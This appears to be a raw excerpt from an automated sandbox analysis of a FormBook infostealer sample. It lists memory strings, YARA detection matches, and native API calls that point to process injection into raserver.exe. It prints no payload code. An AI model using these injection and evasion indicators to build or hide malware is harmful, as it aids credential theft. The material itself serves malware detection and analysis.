            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/6#
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/G#Por
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/L#Ko
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0/
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/aali
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ana
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h#wo0
            Source: hvEop8Y70Y.exe, 00000000.00000003.242909574.0000000005DC4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rpor
            Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmp, hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: hvEop8Y70Y.exe, 00000000.00000003.238351604.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.comte
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: hvEop8Y70Y.exe, 00000000.00000003.240127889.0000000005DC9000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krndo
            Source: explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: hvEop8Y70Y.exe, 00000000.00000003.239195731.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com2
            Source: hvEop8Y70Y.exe, 00000000.00000003.238931392.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comI
            Source: hvEop8Y70Y.exe, 00000000.00000003.239146242.0000000005DDB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comc
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: hvEop8Y70Y.exe, 00000000.00000002.266687829.0000000005EB0000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.289221602.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.311261604.00000000011B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.311590903.00000000011E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000004.00000002.310331740.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.504377982.0000000000380000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.507153893.0000000000C80000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.hvEop8Y70Y.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 4.2.hvEop8Y70Y.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D6D78 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D6D70 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_004181B0 NtCreateFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00418260 NtReadFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_004182E0 NtClose,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015199A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015198F0 NtReadVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519A00 NtProtectVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519A20 NtResumeThread,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519540 NtReadFile,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015195D0 NtClose,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015197A0 NtUnmapViewOfSection,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015196E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519950 NtQueueApcThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015199D0 NtCreateProcessEx,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151B040 NtSuspendThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519820 NtEnumerateKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015198A0 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519B00 NtSetValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151A3B0 NtGetContextThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519A10 NtQuerySection,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519A80 NtOpenDirectoryObject,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519560 NtWriteFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151AD30 NtSetContextThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519520 NtWaitForSingleObject,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015195F0 NtQueryInformationFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151A770 NtOpenThread,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519770 NtSetInformationFile,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519760 NtOpenProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0151A710 NtOpenProcessToken,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519730 NtQueryVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519650 NtQueryValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519670 NtQueryInformationProcess,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01519610 NtEnumerateValueKey,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015196D0 NtCreateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9840 NtDelayExecution,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9860 NtQuerySystemInformation,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9540 NtReadFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E95D0 NtClose,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E99A0 NtCreateSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9650 NtQueryValueKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9A50 NtCreateFile,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9660 NtAllocateVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E96D0 NtCreateKey,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9710 NtQueryInformationToken,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9FE0 NtCreateMutant,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9780 NtMapViewOfSection,LdrInitializeThunk,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044EB040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E98F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E98A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9560 NtWriteFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9520 NtWaitForSingleObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044EAD30 NtSetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E99D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E95F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044EA770 NtOpenThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044EA710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E9730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044E97A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044EA3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_003981B0 NtCreateFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00398260 NtReadFile,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_003982E0 NtClose,
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00398390 NtAllocateVirtualMemory,
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BA9EA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BDCE7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BE078
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_02CFC2B0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_02CF9990
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_02D61830
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_02D60448
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D5360
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075DBF98
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D2060
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D78F8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D534F
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1378
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D2B60
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D8B10
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D2B29
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D8B20
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1BD8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D8FF2
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1BE8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1388
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1E48
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D1E38
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D7E30
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D19B0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D19A0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D2050
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D0810
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D0801
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D9000
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D78F4
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_075D78AA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BAAC7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 0_2_008BAA54
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00401030
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B960
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041C212
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041CB21
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00408C50
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041B493
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00402D88
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00402D90
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041CE0C
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0041CF16
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_00402FB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009AE078
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009AA9EA
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009ADCE7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014DF900
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F4120
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01591002
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A28EC
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014EB090
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015020A0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A20A8
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A2B28
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159DBD2
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0150EBB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A22AE
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A1D55
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A2D07
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014D0D20
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A25DD
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014ED5E0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_01502581
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159D466
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014E841F
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A1FF1
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_0159D616
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_014F6E30
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_015A2EF7
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009AAA54
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: 4_2_009AAAC7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456D466
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04561002
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044B841F
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045728EC
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BB090
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D20A0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045720A8
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04571D55
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044AF900
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04572D07
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044A0D20
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C4120
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045725DD
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044BD5E0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044D2581
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044C6E30
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04572EF7
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_045722AE
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04572B28
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0456DBD2
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_04571FF1
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_044DEBB0
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039CB21
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00388C50
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00382D90
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00382D88
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039CE0C
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_0039CF16
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 14_2_00382FB0
            Source: C:\Users\user\Desktop\hvEop8Y70Y.exeCode function: String function: 014DB150 appears 35 times
            Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 044AB150 appears 35 times
            Source: hvEop8Y70Y.exe, 00000000.00000002.262152823.0000000003FD3000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll" vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000000.234604097.0000000000952000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000002.261538858.0000000002F11000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll2 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000000.00000002.272029106.0000000008BE0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.310678097.0000000000A42000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.311914487.0000000001253000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exe, 00000004.00000002.312736573.000000000175F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exeBinary or memory string: OriginalFilenameHebrewValue.exe4 vs hvEop8Y70Y.exe
            Source: hvEop8Y70Y.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000E.00000002.505716758.0000000000730000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
